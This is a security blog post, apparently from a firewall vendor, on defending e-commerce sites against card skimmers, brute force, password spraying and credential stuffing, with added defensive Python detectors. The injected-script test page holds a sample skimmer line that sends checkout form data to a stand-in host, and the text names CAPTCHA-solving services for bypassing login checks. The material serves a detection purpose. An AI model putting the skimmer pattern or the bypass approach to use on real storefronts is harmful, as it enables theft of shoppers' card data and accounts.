During the holiday shopping season, online businesses are counting on a spike in online traffic. Web advertising is in place, new products have been posted, and shopping carts are ready for an influx of returning customers and new shoppers. What they may not be ready for is the number of cybercriminals staking out their online stores looking for ways to intercept customer transactions, spread malware, and access databases filled with customer data.
Which means that in addition to its being time to warm up the wassail and hang the mistletoe, it’s also time for organizations to review how they’re securing their Web storefront.
This past year we have seen a steady increase in online crime. The cybercrime consortium known as MageCart, for example, has been very active over the past year loading credit card skimmers onto websites. This past summer, FortiGuard Labs researchers detailed a MageCart campaign that exploited vulnerable websites to plant skimmer malware, enabling the campaign to steal data from over 185,000 payment cards in a one-year operation.
Protecting your website from a digital skimmer requires three things. First, your website code, and the third-party scripts it loads, needs to be tested to ensure that it is not vulnerable to attacks that allow skimming code to be injected into your pages. Second, you need a tool like a web application firewall (WAF) that can detect and block injection attacks. And finally, you can use your WAF to inspect the pages your server sends out for injected script and to block traffic to the cybercriminals’ command and control (C&C or C2) server. Keep in mind that a skimmer runs in the shopper’s browser, so the stolen card data leaves from the shopper’s machine rather than from your server; a Content Security Policy that restricts which hosts may serve script to your pages is what closes that path.
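The following is an added example, not code from the original post or from any vendor product. It does what a response-inspecting WAF rule or a nightly page-integrity job would do for a storefront: parse the checkout HTML the server sends to shoppers, flag any external script host that is not on an allowlist (including protocol-relative and data: URLs, two common injection forms), flag any inline script whose SHA-256 is not in the known-good baseline, and build the matching Content-Security-Policy script-src directive so the browser enforces the same allowlist. The hostnames, the baseline and the sample page are constructed for the example.

```python
"""Baseline check for injected scripts in a storefront page.

Added example (not from the original article). The allowed hosts, the
baseline hashes and CHECKOUT_PAGE are constructed test data.
"""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collect external <script src> URLs and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands <script> contents to handle_data as raw text.
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf).strip())
            self._in_inline = False


def find_unexpected_scripts(html, allowed_hosts, baseline_hashes):
    """Return [(kind, detail)] for scripts that deviate from the baseline.

    kind is "external" (detail = the src URL) or "inline" (detail = SHA-256
    hex of the script body). Relative src values are same-origin and pass.
    """
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        u = urlparse(src)
        if u.scheme in ("data", "javascript"):
            findings.append(("external", src))          # never legitimate here
        elif u.hostname is not None and u.hostname.lower() not in allowed_hosts:
            findings.append(("external", src))          # unknown third-party host
    for body in parser.inline:
        digest = hashlib.sha256(body.encode()).hexdigest()
        if digest not in baseline_hashes:
            findings.append(("inline", digest))         # drift from baseline
    return findings


def csp_script_src(allowed_hosts, baseline_hashes):
    """script-src directive enforcing the same allowlist in the browser."""
    hashes = ["'sha256-%s'" % base64.b64encode(bytes.fromhex(h)).decode()
              for h in sorted(baseline_hashes)]
    return "script-src 'self' " + " ".join(sorted(allowed_hosts) + hashes)


# Constructed baseline: one approved payment-provider host, one approved inline script.
ALLOWED_HOSTS = {"js.payments.example"}
BASELINE_INLINE = {hashlib.sha256(b'window.shopConfig = {currency: "USD"};').hexdigest()}

# Constructed page: the last two <script> tags are the kind of thing a skimmer injects.
CHECKOUT_PAGE = """<html><head>
<script src="/static/checkout.js"></script>
<script src="https://js.payments.example/v3/"></script>
<script>window.shopConfig = {currency: "USD"};</script>
<script src="//cdn-metrics.example.net/stats.js"></script>
<script>(function(){var f=document.forms[0];f.addEventListener('submit',function(){
new Image().src='https://collect.example.org/?d='+btoa(JSON.stringify(Object.fromEntries(new FormData(f))));});})();</script>
</head><body><form><input name="card"></form></body></html>"""

if __name__ == "__main__":
    for kind, detail in find_unexpected_scripts(CHECKOUT_PAGE, ALLOWED_HOSTS, BASELINE_INLINE):
        print("ALERT", kind, detail)
    print(csp_script_src(ALLOWED_HOSTS, BASELINE_INLINE))
```

Run it against a known-good copy of each checkout page first to record the baseline; after that, any new host or changed inline script is a page to pull from production until someone explains it.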
Passwords are often another weak link in any security strategy, and cybercriminals primarily use three tactics to breach a customer’s account looking for financial information or a vulnerable link back into the internal database.
These attack strategies are:
Brute Force attacks, which are the oldest of all password attack methods. In this strategy, criminals test many passwords, often from a modified dictionary or other wordlist, against a single account hoping the account owner used an easy-to-guess password. Password cracking software combines words, adds common substitutions (a zero for the letter O, a 3 for an E, etc.), and mixes in personal data gleaned from the dark web or social media, such as the names of your family or pets, the towns you grew up in, the schools you attended, your school mascots, and your graduation dates and birthday.
Password Spraying is very similar, except that rather than trying many passwords against a single account, attackers try a few common passwords against a large number of accounts, looking for that one weak link. The attack takes advantage of the fact that most lockout logic counts failures per account: with one or two attempts per username, pulled from the dark web or other sources, the attacker never trips a per-account threshold. It’s similar to ringing every doorbell in an apartment building on the chance that someone will buzz you in.
Preventing both of these sorts of attacks is fairly straightforward. The most important thing is to ensure that your login logic provides basic controls: a single source should not be able to hammer many accounts at once, and nobody should be allowed to fail a password more than a handful of times in a short window. The most common responses are to lock the account after a maximum number of failed attempts (and require a reset or step-up verification to unlock it), and to require a CAPTCHA when a login attempt looks suspicious. Lock accounts with care, since an attacker who can lock out arbitrary users has a cheap denial of service. CAPTCHAs are not perfect either: solving services such as deathbycaptcha and 2captcha, driven from browser automation frameworks like Puppeteer, can be used to get past them with a reasonably high success rate.
Once again, the WAF is your friend. It not only detects attempts to brute force or password spray a website, but can also tell when multiple accounts are being accessed from a common source or set of sources, or when traffic comes from a suspicious server. In those and similar cases, it can not only lock the account but also block the offending origination server from continuing to knock on the door.
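The two patterns above look different in an authentication log, and the difference is why per-account lockout alone is not enough. The following is an added example, not code from the original post or any WAF product: a small detector that walks constructed login events in a hypothetical `timestamp source_ip username result` format, keeps a sliding window of failures per account and per source, and flags brute force (many failures against one account) and spraying (one source failing against many distinct accounts, each only once). The thresholds and window are assumptions to tune against real traffic.

```python
"""Brute-force and password-spraying detection over login events.

Added example (not from the original article). SAMPLE_LOG, the log format,
WINDOW and both thresholds are constructed assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)   # sliding window for counting failures
BRUTE_FORCE_FAILS = 5            # failures against one account within WINDOW
SPRAY_DISTINCT_USERS = 8         # distinct accounts one source fails against within WINDOW

# Constructed log: 203.0.113.7 hammers alice; 198.51.100.9 tries one password
# per account across eight accounts; bob and carol are ordinary users.
SAMPLE_LOG = """\
2023-11-24T10:00:01 203.0.113.7 alice FAIL
2023-11-24T10:00:03 203.0.113.7 alice FAIL
2023-11-24T10:00:05 203.0.113.7 alice FAIL
2023-11-24T10:00:07 203.0.113.7 alice FAIL
2023-11-24T10:00:09 203.0.113.7 alice FAIL
2023-11-24T10:00:11 203.0.113.7 alice FAIL
2023-11-24T10:01:00 192.0.2.44 bob OK
2023-11-24T10:01:30 192.0.2.45 carol FAIL
2023-11-24T10:01:45 192.0.2.45 carol OK
2023-11-24T10:02:00 198.51.100.9 dave FAIL
2023-11-24T10:02:01 198.51.100.9 erin FAIL
2023-11-24T10:02:02 198.51.100.9 frank FAIL
2023-11-24T10:02:03 198.51.100.9 grace FAIL
2023-11-24T10:02:04 198.51.100.9 heidi FAIL
2023-11-24T10:02:05 198.51.100.9 ivan FAIL
2023-11-24T10:02:06 198.51.100.9 judy FAIL
2023-11-24T10:02:07 198.51.100.9 mallory FAIL
"""


def parse_log(text):
    """Parse lines into (timestamp, source_ip, username, success) tuples, oldest first."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, ip, user, result = line.split()
        events.append((datetime.fromisoformat(ts), ip, user.lower(), result == "OK"))
    events.sort(key=lambda e: e[0])
    return events


def detect(events):
    """Return {"brute_force": {user: max_failures}, "spray": {ip: max_distinct_users}}."""
    fails_by_user = defaultdict(list)   # user -> timestamps of failures in window
    fails_by_ip = defaultdict(list)     # ip -> (timestamp, user) of failures in window
    brute, spray = {}, {}
    for ts, ip, user, ok in events:
        if ok:
            continue
        cutoff = ts - WINDOW
        fails_by_user[user] = [t for t in fails_by_user[user] if t > cutoff] + [ts]
        fails_by_ip[ip] = [(t, u) for t, u in fails_by_ip[ip] if t > cutoff] + [(ts, user)]

        # Per-account view: this is all a plain lockout rule ever sees.
        if len(fails_by_user[user]) >= BRUTE_FORCE_FAILS:
            brute[user] = max(brute.get(user, 0), len(fails_by_user[user]))

        # Per-source view: the spraying host never exceeds one failure per
        # account, so only counting distinct targets per source catches it.
        distinct = {u for _, u in fails_by_ip[ip]}
        if len(distinct) >= SPRAY_DISTINCT_USERS:
            spray[ip] = max(spray.get(ip, 0), len(distinct))
    return {"brute_force": brute, "spray": spray}


if __name__ == "__main__":
    findings = detect(parse_log(SAMPLE_LOG))
    for user, n in findings["brute_force"].items():
        print(f"lock account {user}: {n} failures in {WINDOW}")
    for ip, n in findings["spray"].items():
        print(f"block source {ip}: failed against {n} accounts in {WINDOW}")
```

In production the per-source key should include more than the IP (attackers spray from proxy pools), which is why the WAF's reputation and bot-mitigation data matter; the two-view structure stays the same.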
The third strategy, Credential Stuffing, is a little more complicated. It uses a two-step process. First, the attacker draws on the literally billions of stolen accounts and passwords available on the dark web and assembles lists of known username and password pairs, known as combolists. The attack then counts on users to make a very common, and very dangerous, mistake: reusing the same username and password on multiple accounts. Hackers simply use automation tools like Selenium, Puppeteer, cURL, or PhantomJS to run a combolist against the targeted website’s login URL.
What do cybercriminals do with these compromised accounts? Some may attempt to misuse them right away. Once in, they can change the email address to prevent notifications, order merchandise using the account owner’s stored credit card or banking information, or steal other information such as addresses and visible pieces of credit card, bank account, or social security numbers.
But compromised accounts have another value. They can be sold on the dark web for anything from a couple of dollars up to $100. Accounts holding airline miles, bonus points, or especially gaming gear such as skins are particularly valuable, as are those that can transfer points or money, because they can be used for money laundering.
Website owners want to do two things here. The first is to avoid creating a credential spill by having your own database compromised. That starts by ensuring that your website and shopping cart are updated and patched, and by storing passwords only as salted hashes from a deliberately slow function (bcrypt, scrypt or Argon2), so that a stolen database does not immediately become someone else’s combolist. Second is, you guessed it, to install a WAF.
Credential stuffing defenses built into WAF solutions identify login attempts that use compromised combolists by checking them against an up-to-date feed of stolen credentials. Administrators can configure the WAF to take action when a compromised credential is used, including logging the event, sending an alert, and blocking the login attempt.
Of course, we’ve barely scratched the surface of all the ways your online store can be compromised. But a web application firewall can defend against many of them, including the web vulnerabilities listed in the OWASP Top Ten and other common attack strategies. WAF solutions use a comprehensive approach for protecting web applications, including IP reputation, DDoS protection, protocol validation, application attack signatures, bot mitigation, injection prevention, tampering detection, and more. Advanced WAF solutions also leverage machine learning to automatically build and maintain a model of normal user behavior, identifying both benign and malicious application traffic without time-consuming manual application learning.
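The two halves of the credential-stuffing defense described above, not creating a spill and recognizing a known-leaked pair at login, fit in one small login handler. The following is an added example, not code from the original post or any WAF product. It assumes a hypothetical compromised-credential feed delivered as SHA-256 digests of `email:password` pairs (so the plaintext combolist never sits on the login server), stores passwords at rest with scrypt from the Python standard library, and only consults the feed after the password has verified, so the feed cannot be used as an oracle by someone who does not already hold the credential. The combolist and users are constructed.

```python
"""Credential-stuffing check against a compromised-credential feed.

Added example (not from the original article). LEAKED_COMBOLIST, the feed
format and the USERS store are constructed assumptions.
"""
import hashlib
import hmac
import os


def pair_digest(email, password):
    """Digest of a normalized email:password pair, the key used by the feed."""
    pair = f"{email.strip().lower()}:{password}".encode()
    return hashlib.sha256(pair).hexdigest()


# Constructed combolist, in the plaintext form a stuffing tool would replay.
LEAKED_COMBOLIST = [
    ("alice@example.com", "Summer2023!"),
    ("bob@example.com", "hunter2"),
]
# What the login server keeps: digests only.
COMPROMISED_FEED = {pair_digest(e, p) for e, p in LEAKED_COMBOLIST}


def hash_password(password, salt=None):
    """Salted scrypt; a stolen copy of USERS is not directly usable as a combolist."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2 ** 14, r=8, p=1)
    return salt, digest


def verify_password(password, salt, expected):
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected)


USERS = {}  # email -> (salt, scrypt digest)


def register(email, password):
    USERS[email.strip().lower()] = hash_password(password)


def attempt_login(email, password):
    """Return "denied", "compromised" or "ok".

    "compromised" means the password is correct but the pair is in a known
    leak: the caller should force a reset or step-up MFA rather than log the
    user in, since this is exactly the login a stuffing tool would produce.
    """
    email = email.strip().lower()
    record = USERS.get(email)
    if record is None or not verify_password(password, *record):
        return "denied"
    if pair_digest(email, password) in COMPROMISED_FEED:
        return "compromised"
    return "ok"


if __name__ == "__main__":
    register("alice@example.com", "Summer2023!")                    # reused a leaked password
    register("carol@example.com", "correct horse battery staple")  # unique password
    for who, pw in [("alice@example.com", "Summer2023!"),
                    ("carol@example.com", "correct horse battery staple"),
                    ("carol@example.com", "hunter2")]:
        print(who, attempt_login(who, pw))
```

The check is exact-match only: a user who reuses a leaked password with a digit appended is not caught, which is one reason a WAF pairs the feed lookup with the bot-mitigation and rate controls described earlier.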
So as your website works through the crush of holiday shopping, don’t wait to unwrap a shiny new Web Application Firewall for your organization.
Learn more about how FortiGuard Labs provides unmatched security and intelligence services using integrated AI systems. Find out about the FortiGuard Security Services portfolio and sign up for our weekly FortiGuard Threat Brief.
Read about the FortiGuard Security Rating Service, which provides security audits and best practices to guide customers in designing, implementing, and maintaining the security posture best suited for their organization.